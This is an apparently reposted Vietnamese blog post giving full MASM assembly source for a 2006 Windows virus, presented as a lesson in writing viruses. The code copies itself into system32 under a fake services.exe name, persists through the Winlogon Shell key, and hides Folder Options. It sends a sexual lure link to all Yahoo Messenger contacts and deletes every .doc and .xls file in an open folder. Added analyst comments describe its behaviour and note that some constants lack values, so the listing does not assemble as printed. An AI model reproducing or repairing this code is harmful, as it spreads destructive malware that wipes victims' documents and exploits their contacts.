
[Virus] MASM virus Mai Phuong Thuy

Code Asm Virus Mai Phương Thuý 2006

Author: Toan Thang

Origin Link: http://toanthang.spaces.live.com/blog/cns!A4E5440D42A2F4F4!977.entry

Giới thiệu với các bạn phương thức viết virus bằng ngôn ngữ Assembler.
Chức năng của virus :
- khi lây nhiễm vào máy victim sẽ gởi link chứa Virus tới tất cả các nick trong list Yahoo Chat Messenger.
- Xoá tất cả các file *.doc và *.xls.

Code ASM :

.386
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\advapi32.inc

includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\advapi32.lib

; Local declaration mirroring the Win32 FILETIME layout: a 64-bit
; timestamp split into low and high dwords. Only used as a field type
; inside Win32_Find_Data below; the code never reads these fields.
FileTime Struct
dwLowDateTime dd ?
dwHighDateTime dd ?
FileTime Ends

; Local declaration of the WIN32_FIND_DATA (ANSI) layout used by
; FindFirstFile/FindNextFile. Declared here although windows.inc is
; included; with "option casemap:none" this mixed-case name is presumably
; distinct from the header's upper-case one. The only field the code
; touches is cFileName (the matched file name, 260 bytes).
Win32_Find_Data Struct
dwFileAttributes dd ?
ftCreationTime FileTime <>
ftLastAccessTime FileTime <>
ftLastWriteTime FileTime <>
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
cFileName db 260 dup(?)
cAlternate db 260 dup(?)
Win32_Find_Data Ends

.data
;-----------------------------------------------------------------------
; Analyst notes on the data section (defender view).
; The strings below are everything the code writes, searches for or
; deletes; the drop path, registry keys/values and window class names
; are the host-based indicators for this sample. Several EQUs in this
; listing carry no value (sValueType1/2, SamDesired, CmdShow, sDwFlags1/2,
; the sVK_* modifiers, wFormat, wFlags); as printed, those lines are not
; valid MASM, so the listing does not assemble as-is.
;-----------------------------------------------------------------------
sVirusFileName db 180 dup(0)                        ; full path of the running executable (GetModuleFileName)
sWinDir db 180 dup(0)                               ; Windows directory; later extended with sSourceVirus
sSourceVirus db "\system32\drivers\services.exe",0  ; drop location (the real services.exe lives in system32, not drivers\)
HKEY_LOCAL_MACHINE equ 80000002h                    ; predefined hive handle
sSubKey1 db "Software\Microsoft\Windows NT\CurrentVersion\Winlogon",0  ; persistence key
sValueName1 db "Shell",0                            ; Winlogon\Shell: run at logon instead of/alongside Explorer
sValue1 db "Explorer.exe ",0                        ; prefix so the real shell still starts; drop path is appended
sValueFull db 180 dup(0)                            ; "Explorer.exe <drop path>" assembled at runtime
; registry value types / access mask: no values on this page
sValueType1 equ
sValueType2 equ
SamDesired equ
RegHandle dd 0                                      ; HKEY from RegOpenKeyEx, reused for every key
sYahooClass db "YahooBuddyMain",0                   ; window class looked up to detect Yahoo Messenger
; ShowWindow command: no value on this page
CmdShow equ
sRetval dd 0                                        ; HWND of the Yahoo Messenger window
; keybd_event flags and virtual-key codes: modifier/navigation keys have no value on this page
sDwFlags1 equ
sDwFlags2 equ
sVK_Ctrl equ
sVK_Shift equ
sVK_Alt equ
sVK_Down equ
sVK_End equ
sVK_Enter equ 13
sVK_U equ 85
sVK_N equ 78
sVK_M equ 77
sVK_V equ 86
; lure text placed on the clipboard and pasted into Messenger (contains the download link)
sVirusMsg db "hinh chup len hoa hau Mai Phuong Thuy ... dang thay quan ao trong toilet ... ",13,10
db "khi con la hoc sinh ... http://my.http.vn/hinhvn/miss_thuy.jpg :D",0
; clipboard format / GlobalAlloc flags: no values on this page
wFormat equ
wFlags equ
hGlobalMemory dd 0                                  ; HGLOBAL handed to SetClipboardData
lpGlobalMemory dd 0                                 ; locked pointer used for lstrcpy
HKEY_CURRENT_USER equ 80000001h                     ; predefined hive handle
sSubKey2 db "Software\Microsoft\Internet Explorer\Main",0
sValueName2 db "Window Title",0                     ; IE title-bar text (cosmetic marker of infection)
sExplorerTitle db ".:: Yeu Giang Son Va Yeu My Nhan ::.",0
sSubKey3 db "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer",0
sValueName3 db "NoFolderOptions",0                  ; =1 hides Explorer's Folder Options (hinders manual cleanup)
sGt dd 1                                            ; DWORD 1 written to both NoFolderOptions and FullPath
sSubKey4 db "Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState",0
sValueName4 db "FullPath",0                         ; =1 makes Explorer's title bar show the full folder path (read back below)
Search Win32_Find_Data <>                           ; FindFirstFile/FindNextFile output
sExplClass db "CabinetWClass",0                     ; Explorer window class
sFileLay db "\Thong Bao.exe",0                      ; name of the copy dropped into the open folder
sExplTitle db 180 dup(0)                            ; Explorer window title == folder path
sFindHandle dd 0                                    ; HWND of the Explorer window
sFileHandle dd 0                                    ; search handle from FindFirstFile
sLuu1 db 180 dup(0)                                 ; folder + "\" + matched file name (DeleteFile target)
sLuu2 db 180 dup(0)                                 ; folder + search pattern
sDocFile db "\*.doc",0
sXlsFile db "\*.xls",0
sThem db "\",0
.code
;-----------------------------------------------------------------------
; Main — program entry (stdcall Win32 API calls, no stack frame, no
; parameters). Analyst notes, behaviour as visible in this listing:
;  1. Copies itself to <WinDir>\system32\drivers\services.exe.
;  2. Persistence: HKLM\...\Winlogon\Shell = "Explorer.exe <drop path>";
;     skipped if RegOpenKeyEx fails (eax != 0), i.e. without HKLM write
;     access.
;  3. HKCU changes: IE "Window Title", Policies\Explorer\NoFolderOptions=1,
;     Explorer\CabinetState\FullPath=1 (the last makes Explorer's title
;     bar carry the full folder path, which step 5 reads back).
;  4. If a "YahooBuddyMain" window exists: waits 60 s, blocks user input,
;     places sVirusMsg on the clipboard and drives the Messenger UI with
;     keybd_event keystrokes to paste it (per the author's comments: to
;     every nick and into the status line), then waits 180 s.
;  5. Finds a "CabinetWClass" (Explorer) window, copies itself into that
;     folder as "Thong Bao.exe" and deletes every *.doc and *.xls there.
;  6. Sleeps 800 ms and loops to step 4; the ExitProcess at the end is
;     unreachable, so the process runs until killed.
; Detection/response: watch writes to Winlogon\Shell and the two HKCU
; Explorer values; a services.exe under system32\drivers is not where the
; legitimate binary lives. Cleanup means removing the dropped files and
; restoring Shell to "Explorer.exe" alone.
;-----------------------------------------------------------------------
Main:
; sVirusFileName = full path of this executable (hModule = NULL)
push 180
push offset sVirusFileName
push 00h
call GetModuleFileName

; sWinDir = GetWindowsDirectory() + "\system32\drivers\services.exe";
; CopyFile(self, sWinDir, bFailIfExists=1): an existing copy is kept.
push 180
push offset sWinDir
call GetWindowsDirectory

push offset sSourceVirus
push offset sWinDir
call lstrcat

push 1
push offset sWinDir
push offset sVirusFileName
call CopyFile

; Persistence: sValueFull = "Explorer.exe " + drop path, written to
; HKLM\...\Winlogon\Shell. RegHandle is closed even when the open failed
; (it then still holds 0).

push offset sValue1
push offset sValueFull
call lstrcat

push offset sWinDir
push offset sValueFull
call lstrcat
push offset RegHandle
push SamDesired
push 00h
push offset sSubKey1
push HKEY_LOCAL_MACHINE
call RegOpenKeyEx

test eax,eax
jnz Exit1

push 180                         ; cbData = whole 180-byte buffer, not the string length
push offset sValueFull
push sValueType1
push 00h
push offset sValueName1
push RegHandle
call RegSetValueEx

Exit1:
push RegHandle
call RegCloseKey

; HKCU\Software\Microsoft\Internet Explorer\Main\Window Title = sExplorerTitle
; (38 bytes written; cosmetic marker)
push offset RegHandle
push SamDesired
push 00h
push offset sSubKey2
push HKEY_CURRENT_USER
call RegOpenKeyEx

test eax,eax
jnz Exit2

push 38
push offset sExplorerTitle
push sValueType1
push 00h
push offset sValueName2
push RegHandle
call RegSetValueEx

Exit2:
push RegHandle
call RegCloseKey

; HKCU\...\Policies\Explorer\NoFolderOptions = 1 (4-byte DWORD from sGt):
; hides Explorer's Folder Options menu
push offset RegHandle
push SamDesired
push 00h
push offset sSubKey3
push HKEY_CURRENT_USER
call RegOpenKeyEx

test eax,eax
jnz Exit3

push 4d
push offset sGt
push sValueType2
push 00h
push offset sValueName3
push RegHandle
call RegSetValueEx

Exit3:
push RegHandle
call RegCloseKey

; HKCU\...\Explorer\CabinetState\FullPath = 1: Explorer shows the full
; folder path in its title bar, which the Exit section below relies on
push offset RegHandle
push SamDesired
push 00h
push offset sSubKey4
push HKEY_CURRENT_USER
call RegOpenKeyEx

test eax,eax
jnz Exit4

push 4d
push offset sGt
push sValueType2
push 00h
push offset sValueName4
push RegHandle
call RegSetValueEx

Exit4:
push RegHandle
call RegCloseKey

; Propagation loop: look for a Yahoo Messenger main window (class
; "YahooBuddyMain"); when none is found, fall through to the Explorer
; part at Exit.

_While:
push 00h
push offset sYahooClass
call FindWindow
mov sRetval,eax
cmp eax,0
jz Exit

; Wait 60 s, block keyboard/mouse input (BlockInput(1)), then show and
; foreground the Messenger window so the synthesized keystrokes land there
push 60000
call Sleep
push 1
call BlockInput
push CmdShow
push sRetval
call ShowWindow

push sRetval
call SetForegroundWindow

; Put sVirusMsg on the clipboard: GlobalAlloc(wFlags, lstrlen+1),
; GlobalLock, lstrcpy, GlobalUnlock, then OpenClipboard(NULL) /
; EmptyClipboard / SetClipboardData(wFormat, hGlobalMemory) / CloseClipboard
push offset sVirusMsg
call lstrlen
inc eax
push eax
push wFlags
call GlobalAlloc
mov hGlobalMemory,eax

push eax
call GlobalLock
mov lpGlobalMemory,eax

push offset sVirusMsg
push lpGlobalMemory
call lstrcpy

push hGlobalMemory
call GlobalUnlock

push 00h
call OpenClipboard

call EmptyClipboard

push hGlobalMemory
push wFormat
call SetClipboardData
call CloseClipboard

; Synthesized keystrokes via keybd_event. Each key is a press (flags 0)
; followed by a release (sDwFlags1; value absent on this page).
; Sequence: Ctrl+M, Down, Shift+End, Enter — per the author's comment,
; this selects all nick names — then Ctrl+V, Enter pastes and sends.
push 00h
push 00h
push 00h
push sVK_Ctrl
call keybd_event

push 00h
push 00h
push 00h
push sVK_M
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_M
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_Ctrl
call keybd_event

push 00h
push 00h
push 00h
push sVK_Down
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_Down
call keybd_event

push 00h
push 00h
push 00h
push sVK_Shift
call keybd_event

push 00h
push sDwFlags2                   ; End is pressed with sDwFlags2 (value absent on this page)
push 00h
push sVK_End
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_End
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_Shift
call keybd_event

push 00h
push 00h
push 00h
push sVK_Enter
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_Enter
call keybd_event
push 00h
push 00h
push 00h
push sVK_Ctrl
call keybd_event

push 00h
push 00h
push 00h
push sVK_V
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_V
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_Ctrl
call keybd_event

push 00h
push 00h
push 00h
push sVK_Enter
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_Enter
call keybd_event
; Second sequence: Alt+M, U, N, Ctrl+V, Enter, Enter — per the author's
; comment this places the link in the Messenger status line.
push 00h
push 00h
push 00h
push sVK_Alt
call keybd_event

push 00h
push 00h
push 00h
push sVK_M
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_M
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_Alt
call keybd_event

push 00h
push 00h
push 00h
push sVK_U
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_U
call keybd_event

push 00h
push 00h
push 00h
push sVK_N
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_N
call keybd_event

push 00h
push 00h
push 00h
push sVK_Ctrl
call keybd_event

push 00h
push 00h
push 00h
push sVK_V
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_V
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_Ctrl
call keybd_event

push 00h
push 00h
push 00h
push sVK_Enter
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_Enter
call keybd_event

push 00h
push 00h
push 00h
push sVK_Enter
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_Enter
call keybd_event
; BlockInput(0) restores user input; then 180 s pause before the
; Explorer section
push 0
call BlockInput

push 180000
call Sleep
Exit:
; Find an Explorer window (class "CabinetWClass"). With FullPath=1 set
; above its title is the folder path; sExplTitle = title + "\Thong Bao.exe"
; and the running file is copied there (bFailIfExists=1).
push 00h
push offset sExplClass
call FindWindow
mov sFindHandle,eax

push 180
push offset sExplTitle
push sFindHandle
call GetWindowText

push offset sFileLay
push offset sExplTitle
call lstrcat

push 1
push offset sExplTitle
push offset sVirusFileName
call CopyFile

; Delete *.doc in that folder. sExplTitle is re-read (now the bare
; folder path); sLuu1 = folder, sLuu2 = folder + "\*.doc".
push 180
push offset sExplTitle
push sFindHandle
call GetWindowText

push offset sExplTitle
push offset sLuu1
call lstrcpy

push offset sExplTitle
push offset sLuu2
call lstrcpy

push offset sDocFile
push offset sLuu2
call lstrcat

push offset Search
push offset sLuu2
call FindFirstFile
mov dword ptr [sFileHandle],eax

; Loop invariant at FindNextDoc: Search.cFileName holds the current
; match and sLuu1 holds the bare folder path. The loop exits when eax is
; zero — on the first pass eax is FindFirstFile's return value, on later
; passes FindNextFile's BOOL.
FindNextDoc:
test eax,eax
jz KetThucDoc

push offset sThem
push offset sLuu1
call lstrcat

push offset Search.cFileName
push offset sLuu1
call lstrcat

push offset sLuu1                ; DeleteFile(folder + "\" + cFileName)
call DeleteFile

mov sLuu1,00h                    ; truncate sLuu1 to "" and rebuild it as the folder path
push offset sExplTitle
push offset sLuu1
call lstrcat

push offset Search
push dword ptr [sFileHandle]
call FindNextFile
jmp FindNextDoc
KetThucDoc:

; Same enumeration again for *.xls (sLuu2 = folder + "\*.xls")
push offset sExplTitle
push offset sLuu1
call lstrcpy

push offset sExplTitle
push offset sLuu2
call lstrcpy

push offset sXlsFile
push offset sLuu2
call lstrcat

push offset Search
push offset sLuu2
call FindFirstFile
mov dword ptr [sFileHandle],eax

; Identical loop shape to FindNextDoc, exiting when eax is zero
FindNextXls:
test eax,eax
jz KetThucXls

push offset sThem
push offset sLuu1
call lstrcat

push offset Search.cFileName
push offset sLuu1
call lstrcat

push offset sLuu1
call DeleteFile

mov sLuu1,00h
push offset sExplTitle
push offset sLuu1
call lstrcat

push offset Search
push dword ptr [sFileHandle]
call FindNextFile

jmp FindNextXls
KetThucXls:
; 800 ms pause, then back to the top of the propagation loop. The
; ExitProcess below is never reached, so the process lives until killed.
push 800
call Sleep
jmp _While
push 00h
call ExitProcess
End Main

Mọi ý kiến thắc mắc hãy comment cho tui.